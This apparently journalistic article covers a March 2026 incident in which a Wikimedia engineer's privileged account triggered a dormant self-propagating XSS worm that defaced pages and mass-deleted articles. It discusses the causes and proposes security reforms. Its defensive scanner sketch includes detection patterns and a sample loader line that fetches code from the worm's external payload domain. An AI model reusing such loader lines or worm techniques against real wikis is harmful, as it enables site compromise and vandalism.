Nearly Right

Wikipedia's own security review triggered the breach it was meant to prevent

A dormant worm, a privileged account, and the systemic vulnerabilities of the internet's most important encyclopaedia

On 5 March 2026, a staff security engineer at the Wikimedia Foundation sat down to conduct a routine review of user-authored code on Wikipedia. The task was straightforward enough: evaluate the sprawling ecosystem of custom JavaScript scripts that Wikipedia's editors rely upon to customise their experience. To do this efficiently, the engineer began loading a batch of random user scripts into his own account's global JavaScript configuration. He did not create test scripts for the purpose. He did not use a sandboxed environment. He loaded the scripts under his highly privileged Wikimedia Foundation staff account, one with permissions to edit the global CSS and JavaScript that executes on every single page across every Wikimedia project.

One of the scripts he loaded was two years old, uploaded to Russian Wikipedia in March 2024 by a user called Ololoshka562. It had sat dormant since then, unreviewed and unnoticed. Within seconds of execution, it began to spread.

Twenty-three minutes of chaos

The script was a self-propagating XSS worm, and it worked with brutal efficiency. Once activated, it attempted two things simultaneously. First, it overwrote the infected user's personal common.js file with a loader that would re-execute the malicious code every time they browsed the wiki. Second, and far more destructively, if the infected user held sufficient privileges, it edited the global MediaWiki:Common.js script, which runs for every logged-in editor on the site. Because the security engineer's account had exactly those privileges, the worm achieved global persistence almost instantly.

From there, the infection cascaded. Every editor whose browser loaded the compromised global script became a new carrier. The worm copied itself into their personal scripts, then used their session credentials to vandalise random articles, inserting a grotesquely oversized image and hidden JavaScript. If an infected user happened to be an administrator, the worm went further still, abusing Wikipedia's Special:Nuke page to mass-delete articles from the main namespace.

According to BleepingComputer's analysis, 3,996 pages were modified and around 85 users had their common.js files replaced before engineers contained the outbreak. The Wikimedia Foundation's system reliability engineering team switched all wiki projects to read-only mode, forcibly disabled user JavaScript across the platform, and began the painstaking work of reverting every malicious edit. The entire episode, from activation to containment, lasted 23 minutes.

The worm itself was not sophisticated. Security researchers who examined the code noted it used jQuery, a library that speaks to its vintage rather than any technical ambition. It referenced an external domain, basemetrika.ru, that did not even resolve to an active server, suggesting either a programming error by the original author or a payload delivery mechanism that had long since expired. There was something almost quaint about it, an old-fashioned virus concerned with vandalism and spectacle rather than the silent data exfiltration or cryptocurrency mining that characterises modern malware. It belonged to a known family of attacks in the Russian Wikipedia community called "woodpecker" scripts, a type of worm that had been used to deface smaller MediaWiki installations for over a decade. The earliest variants date to at least 2007. This was old ordnance, not a precision weapon.

The ghost of MySpace past

For anyone with a long memory in web security, the incident carried an unmistakable echo. In October 2005, a 19-year-old hacker named Samy Kamkar inserted a small piece of JavaScript into his MySpace profile. Within 20 hours, over a million users had unknowingly added him as a friend. The Samy worm, as it became known, was the first major XSS worm to make headlines, and it rewrote the rules of web application security overnight. Jeremiah Grossman, then a leading web security researcher, later described it as the moment the entire industry had been waiting for. At the time, an estimated 80 to 90 per cent of websites were vulnerable to similar attacks.

Twenty-one years later, Wikipedia fell to the same category of exploit. The technical specifics differ, but the underlying pattern is identical: a platform that allows users to embed executable code in pages, inadequate sanitisation of that code, and a propagation mechanism that turns every visitor into an unwitting accomplice. That a top-ten global website remained vulnerable to a class of attack first demonstrated on MySpace speaks to something more fundamental than a single engineer's mistake.

A $187 million organisation with volunteer-grade security

The Wikimedia Foundation's annual budget for the 2025-26 fiscal year runs to roughly $187 million. It employs hundreds of staff, operates data centres serving billions of page views per month, and maintains one of the most consequential information resources in human history. By any measure, it is a substantial institution.

Its security architecture, however, still bears the fingerprints of the scrappy volunteer project Wikipedia was in 2001. The user scripting system at the heart of this incident is a case in point. MediaWiki, the software that powers Wikipedia, allows any registered user to create personal JavaScript and CSS files that execute in their browser whenever they visit the site. For editors with "interface administrator" privileges, a small group of just 15 on English Wikipedia, the power extends to editing global scripts that run for every user. Mandatory two-factor authentication for this group was introduced only a few years ago. No code review process exists for changes to these scripts. There is no sandboxing, no content security policy enforcement, no automated scanning for malicious patterns.
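To make the mechanics concrete, here is a sketch of the kind of line a personal common.js typically contains. The user and script names are hypothetical; loading a wiki page with `action=raw&ctype=text/javascript` is the long-standing MediaWiki convention for serving its text as executable JavaScript.

```javascript
// Illustrative sketch of a user-script import in a personal common.js.
// "ExampleUser" and "some-tool.js" are hypothetical names.
const scriptUrl =
  'https://en.wikipedia.org/w/index.php' +
  '?title=User:ExampleUser/some-tool.js' +
  '&action=raw&ctype=text/javascript';

// In the browser, MediaWiki's loader fetches that page and executes
// whatever it currently contains, with the full privileges of the
// logged-in session: no review, no sandbox, no integrity check.
if (typeof mw !== 'undefined') {
  mw.loader.load(scriptUrl);
}
```

Whatever that page holds at fetch time runs as the logged-in user, which is why a single compromised script, or a single privileged account loading untrusted ones, reaches so far.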

This is not an oversight that nobody noticed. Wikipedia's own documentation for interface administrators states plainly that the ability to edit JavaScript executed in other users' browsers is "very powerful, and extremely dangerous in the hands of a malicious user." The danger has been named and acknowledged for years. But naming a risk and governing it are different things entirely.

Wikipedia's editing community has long taken a cavalier attitude towards security, and the reasons are structural rather than a matter of negligence. Most editors are not professional developers. They are historians, linguists, hobbyists, and obsessives who came to write an encyclopaedia, not to manage an attack surface. When the Foundation has attempted to impose restrictions on scripting, editors have tended to interpret the move as a power grab, an attempt by paid staff to wrest control from the volunteers who actually produce the content. The result is an ecosystem of unsandboxed JavaScript gadgets, many maintained by long-abandoned user accounts, powering the editing tools that Wikipedia's most active contributors depend upon daily.

Rebar in the concrete

The Atlantic Council published a report comparing open-source software to the rebar inside reinforced concrete, the catenary wires above an electric train, or the water treatment plants that ensure safe drinking water. It is structurally critical, hidden from end users, and chronically underappreciated. The analogy extends uncomfortably well to Wikipedia's scripting infrastructure. The custom JavaScript that editors rely upon is not a cosmetic feature. It provides editing tools, moderation utilities, and workflow automation that the Wikimedia Foundation has been too slow to build into the official software. Without these scripts, many of Wikipedia's most productive editors would find the platform significantly harder to use.

This creates a dependency trap. The volunteer-authored scripts are essential, but they exist outside any formal security governance. They are not audited, not version-controlled in any meaningful way, and not subject to the kind of review that professional software development demands. The worm that lay dormant on Russian Wikipedia for two years was sitting in precisely this ungoverned space. Nobody checked it because nobody checks any of them, at least not systematically.

The parallel to the broader open-source security crisis is exact. When the Log4Shell vulnerability was discovered in the Apache Log4j library in December 2021, it sent shockwaves through the technology industry. The library was maintained by a small group of volunteers and was embedded in software used by governments and corporations worldwide. The US Cybersecurity and Infrastructure Security Agency subsequently classified open-source software security as a critical infrastructure concern. A 2022 survey by Tidelift found that more than half of open-source maintainers described themselves as unpaid hobbyists.

Wikipedia's user script ecosystem is a microcosm of this larger problem, but with an additional complication. In most open-source projects, the governance gap exists because nobody is paying attention. At Wikipedia, the Foundation is paying attention; it simply lacks the political capital to act. Editors, who are volunteers and who produce all of Wikipedia's content, resist security measures they perceive as restrictions on their autonomy. The Foundation, which depends entirely on those volunteers, is reluctant to force the issue.

The organisational accident

Safety engineers who study industrial disasters have a term for what happened on 5 March: a "normal accident." Charles Perrow coined the phrase in 1984, after studying the Three Mile Island nuclear incident, to describe failures that emerge inevitably from the interaction of complex, tightly coupled systems. The components of the system may each function as designed, but their interaction produces catastrophe. The Wikipedia incident fits the pattern with uncomfortable precision. A security engineer conducted a test. The test involved loading user scripts. The scripts included a dormant worm. The engineer's account had global privileges. The worm exploited those privileges to achieve platform-wide persistence. Every individual element of this chain was, by Wikipedia's existing standards, permitted. The system was not broken by an intruder. It was broken by someone doing their job, in the way the system allowed them to do it.

This is what distinguishes the incident from a conventional security breach. The attacker, insofar as there was one, was a volunteer script author who had uploaded malicious code two years earlier and apparently forgotten about it. The vector was not a sophisticated hack but a predictable consequence of a system that permits privileged users to execute arbitrary, unreviewed code. It is tempting to blame the individual engineer, and his decision to run random scripts under a privileged account was indefensible on its own terms. But focusing on his lapse misses the point. He was the proximate cause; the organisation built the conditions. A system that allows a single routine test to cascade into a platform-wide compromise is a system that has already failed. It was merely waiting for someone to demonstrate it.

The case for restraint

It would be easy to catastrophise. Wikipedia was not, in fact, seriously harmed. The worm affected Meta-Wiki, a coordination site, rather than the encyclopaedia itself. The Foundation's response was swift, with read-only mode imposed within minutes and the situation fully resolved within hours. No personal data was compromised. All deleted articles were restored. The 23-minute window of active infection was remarkably short, a testament to the monitoring systems that did exist and the speed of the engineering team.

The scripting system, for all its risks, delivers genuine value. Wikipedia's official development pipeline is notoriously slow, constrained by the Foundation's limited engineering resources and the difficulty of building for a platform with hundreds of language editions and wildly varying community needs. User scripts fill the gap. Tools like Twinkle, which streamlines anti-vandalism work, or the various citation-formatting scripts that editors rely upon, were all built by volunteers using precisely the system that the worm exploited. Restricting it without providing alternatives would hobble the editors who keep Wikipedia functioning.

The tension is real, and anyone who proposes a simple fix is not taking the problem seriously.

What would actually help

The Wikimedia Foundation's official statement promised "additional security measures" developed "in consultation with the community." The details remain unspecified. But the broad outlines of what credible reform would look like are not mysterious. Mandatory code review for changes to global JavaScript would be the most obvious step, analogous to the pull request workflow that is standard practice in virtually every professional software project. A content security policy restricting which scripts can execute in editors' browsers would limit the blast radius of any future compromise. Automated scanning of user script pages for known malicious patterns could catch dormant threats like the one that sat undetected for two years. And the principle of least privilege, the idea that accounts should have only the permissions they actually need for a given task, should be enforced ruthlessly for Foundation staff accounts.
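Of those measures, automated scanning is the easiest to prototype. What follows is a minimal sketch, assuming nothing about Wikimedia's actual tooling: a pattern-based pass over script text. The patterns, messages, and the sample loader stub are illustrative only; a serious scanner would parse the code rather than grep it, and maintain a curated, regularly updated ruleset.

```javascript
// Illustrative ruleset: each entry pairs a regex with a human-readable
// reason. These are examples of the kind of signal worth flagging,
// not a vetted production list.
const SUSPICIOUS = [
  {
    re: /mw\.loader\.load\(\s*['"]https?:\/\/(?!(?:[\w-]+\.)*(wikipedia|wikimedia)\.org)/,
    why: 'loads code from a non-Wikimedia domain',
  },
  { re: /\beval\s*\(/, why: 'uses eval on dynamic input' },
  { re: /MediaWiki:Common\.js/, why: 'touches the global Common.js page' },
  { re: /Special:Nuke/, why: 'invokes mass-deletion tooling' },
];

// Return the list of reasons a given script's source looks suspicious.
function scanScript(source) {
  return SUSPICIOUS
    .filter(({ re }) => re.test(source))
    .map(({ why }) => why);
}

// Example: a loader stub pointing at an external payload domain,
// the shape of thing the worm wrote into infected common.js files.
const findings = scanScript(
  "mw.loader.load('https://basemetrika.ru/payload.js');"
);
// findings -> ['loads code from a non-Wikimedia domain']
```

A pass like this would not catch a determined attacker, but it would have flagged a two-year-old script calling out to an unknown Russian domain, which is precisely the sort of dormant threat that currently goes unexamined.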

None of these measures would be painless. Code review introduces friction. Content security policies break existing workflows. Automated scanning produces false positives. And least privilege means that a security engineer conducting a test cannot simply use their all-powerful staff account because it is convenient. Each of these changes would face resistance from a community that prizes autonomy and views bureaucratic process with suspicion.
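For a sense of what that content-security trade-off looks like in practice, a policy along the following lines (the directive values are illustrative, not Wikimedia's actual configuration) would have blocked the worm's attempt to fetch code from its external payload domain:

```http
Content-Security-Policy:
    script-src 'self' https://*.wikipedia.org https://*.wikimedia.org;
    object-src 'none';
    base-uri 'self'
```

The same policy would equally block every gadget that loads code from outside the allowed origins, which is exactly why tightening it is a negotiation with the community rather than a configuration change.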

But the alternative is to wait for the next worm. The one uploaded to Russian Wikipedia two years ago was, by the admission of everyone who examined it, crude and largely ineffective. Its external payload domain did not even exist. The vandalism it produced was conspicuous and easily reversed. A more sophisticated attacker, one who harvested session tokens silently, or who exfiltrated editor credentials through browser autofill exploitation, or who subtly altered article content rather than defacing it with oversized images, could have caused damage that was neither visible nor reversible in 23 minutes.

Wikipedia turned 25 in January. It has grown from a quirky experiment in collective knowledge-building to a foundational piece of the internet's information infrastructure, referenced by search engines, cited by journalists, scraped by artificial intelligence companies training their models. The world treats it as critical infrastructure. It is past time for its security governance to reflect that reality.

#cybersecurity